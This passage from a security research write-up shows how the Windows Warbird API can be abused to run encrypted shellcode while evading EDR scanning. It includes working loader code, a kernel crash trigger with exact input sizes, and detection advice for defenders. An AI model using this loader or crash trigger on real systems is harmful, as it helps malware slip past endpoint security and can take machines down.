After the data has been prepared, we can now load the Microsoft-signed DLL into our process, change the contents of the .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct and encrypted shellcode, mark the section as executable and finally call the Warbird API:

HMODULE clipc = LoadLibraryA("clipc.dll"); // Microsoft-signed DLL
if (clipc == NULL) return 1;
DWORD old;
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_READWRITE, &old);
memcpy(clipc, &params, sizeof(params));
memcpy((uint8_t*)clipc + sizeof(params), &encrypted, sizeof(encrypted));
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_EXECUTE_READ, &old);
NTSTATUS result = 0;
WB_OPERATION request{
      .OperationType = WarbirdRuntime::WbOperationHeapExecuteCall,
      .pHeapExecuteCallArgument = (PHEAP_EXECUTE_CALL_ARGUMENT)clipc,
      .Result = &result
};
NTSTATUS status = NtQuerySystemInformation(SystemCodeFlowTransition, &request, sizeof(request), nullptr);

And that’s it! The kernel will now decrypt the shellcode, place it in the process’s memory and redirect execution to the beginning of the decrypted shellcode. Notice how we never had to invoke any syscall with the decrypted shellcode as an argument? Conventional shellcode loaders usually have to do exactly that: for example, when VirtualProtect is called on a memory region to make it executable, the region usually already contains the decrypted shellcode. EDR products use this as a point of detection by scanning the memory regions passed to the kernel for known signatures. This isn’t possible in our case: an EDR spying on syscalls and scanning associated memory regions will only “see” encrypted shellcode, and thus come up empty-handed. The full code for the above example can be found in our GitHub repository.

Limitations

We’ve now seen how we can load encrypted shellcode using the Warbird API, but there are some limitations to keep in mind:

  1. We still need to call VirtualProtect(RX) to change the permissions of the .text section. This could be detected as suspicious behaviour by some EDR products, but we haven’t seen any detections solely based on this pattern because the contents that are placed in the .text section are fully encrypted and thus not detectable as malicious shellcode.
  2. The functionality we’re abusing here was never intended to be used for entire shellcode payloads but rather for small, sensitive code blocks. The Warbird API limits the size of the encrypted code to 0x10000 bytes, so we cannot load any shellcode larger than 64 KiB. There might be ways to work around this limitation by dynamically loading and re-linking the shellcode, but this is left as an exercise for the reader 😉

We’ve not put much research effort into the other available operations, especially those not previously documented by DownWithUp, so these are probably a good starting point for further research.

Blue Team Perspective

This technique is very effective at bypassing existing shellcode loading detections. Typically, to simplify a bit, an anti-malware product might scan all memory addresses referenced by an application when it calls a Windows API that could cause execution to start at that address, such as NtCreateThreadEx, or that causes memory to become executable, such as NtProtectVirtualMemory. The anti-malware product may then use a signature database or pattern-based detection to determine whether the memory that is about to be executed is malicious. In some cases, an anti-malware product might simply block any sequence of operations that allocates memory, marks the allocated memory as executable and passes execution to the newly allocated memory, regardless of the actual memory content, especially if the executable performing these operations is not trustworthy by some metric. The technique presented here bypasses this scanning because the memory that we’re “supplying” as pointer arguments to the Windows API only contains encrypted shellcode. The address of the decrypted shellcode, which is allocated by the kernel itself, is not even passed back to userspace. Because the shellcode is decrypted and executed “in one go” by the kernel itself, any hooks on Windows API calls placed by an anti-malware product are bypassed.

To nonetheless detect this behaviour, an anti-malware product has several options: it may itself decrypt any shellcode passed to NtQuerySystemInformation and check the decrypted shellcode for known signatures, it may block any use of Warbird APIs in non-Microsoft processes, or it may rely on behaviour detection and periodic memory scanning to detect known malicious shellcode once it has been decrypted by the kernel.
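The scanning gap described in this section can be illustrated with a small, self-contained sketch. It is only a toy model: `contains_signature` is a hypothetical naive byte-pattern scanner, and `xor_crypt` is a placeholder repeating-key XOR that merely stands in for "some encryption". It is not the cipher Warbird uses, and real products scan in far more sophisticated ways.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

using Bytes = std::vector<uint8_t>;

// Naive signature scan: true if `sig` occurs anywhere in `mem`.
bool contains_signature(const Bytes& mem, const Bytes& sig) {
    return std::search(mem.begin(), mem.end(), sig.begin(), sig.end()) != mem.end();
}

// Placeholder cipher (repeating-key XOR); applying it twice restores the input.
// This is NOT the Warbird cipher, it only stands in for "some encryption".
Bytes xor_crypt(Bytes data, const Bytes& key) {
    assert(!key.empty());
    for (std::size_t i = 0; i < data.size(); ++i) {
        data[i] ^= key[i % key.size()];
    }
    return data;
}
```

A scanner that only ever sees the output of `xor_crypt(payload, key)` has nothing to match against, whereas the same scan over the decrypted bytes finds the pattern again. This is why the detection options above either decrypt the buffer first or scan memory after the kernel has decrypted it.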

Conclusion

This is a very powerful technique, as it allows us to bypass most AV and EDR scrutiny. If an EDR product intercepts the syscall, it will only see the encrypted shellcode, and not the decrypted shellcode that is executed, so any signatures or heuristics that the EDR product uses to detect malicious shellcode will not trigger. We’ve successfully used this technique in practice to bypass multiple leading EDR solutions.

Bonus: BSOD

While researching and experimenting with Warbird, we encountered a bug in the Warbird API that can be used to trigger a blue screen of death. When allocating memory in the process’s heap, the kernel adds some randomness to the base address of the allocated memory, presumably as a kind of “Pseudo Address Space Layout Randomization (ASLR)”. An implementation error in this allocation function causes a divide by zero in the kernel when the required size is between 0xffc1 and 0xffff:

uint32_t slot_count = (required_size + 63) / 64;
uint32_t rand_offset = ExGenRandom(1) % (1024 - slot_count);

Working backwards: when slot_count == 1024, the divisor 1024 - slot_count is zero, so the modulo operation causes a division by zero in the kernel. Because slot_count is simply required_size divided by 64 (rounded up), the bug triggers for 0xffc1 <= required_size <= 0xffff.

The value of required_size here is simply ulSize + 16, so any values for ulSize in the range from 0xffb1 to 0xfff0 will cause the division by zero. We have included a PoC for this bug in our GitHub repository.
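The arithmetic above can be checked with a short sketch. The helper names `slot_count` and `divisor_is_zero` are made up for this illustration, and the code only mirrors the two quoted lines; it says nothing about any other checks the kernel may perform before reaching them.

```cpp
#include <cstdint>

// Mirrors the quoted computation: required_size rounded up to 64-byte slots.
constexpr uint32_t slot_count(uint32_t required_size) {
    return (required_size + 63) / 64;
}

// True when the divisor (1024 - slot_count) of the modulo would be zero.
constexpr bool divisor_is_zero(uint32_t required_size) {
    return slot_count(required_size) == 1024;
}

// Bounds on required_size as stated in the text.
static_assert(!divisor_is_zero(0xffc0), "1023 slots: divisor is 1");
static_assert(divisor_is_zero(0xffc1), "1024 slots: divisor is 0");
static_assert(divisor_is_zero(0xffff), "1024 slots: divisor is 0");

// required_size = ulSize + 16, so the ulSize bounds from the text map to:
static_assert(divisor_is_zero(0xffb1 + 16), "lower ulSize bound");
static_assert(divisor_is_zero(0xfff0 + 16), "upper ulSize bound");
```

Note that 0xfff0 + 16 is 0x10000, which by this formula alone still yields 1024 slots. The sketch cannot tell whether a size check elsewhere in the kernel limits required_size to 0xffff.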

Further Reading

[1] This is actually a bit more involved, as it is relative to the start of the current Warbird block. If we set ulParametersRva to zero though, the offset will be relative to the start of the struct. Refer to the talk by Alex Ionescu for more information.
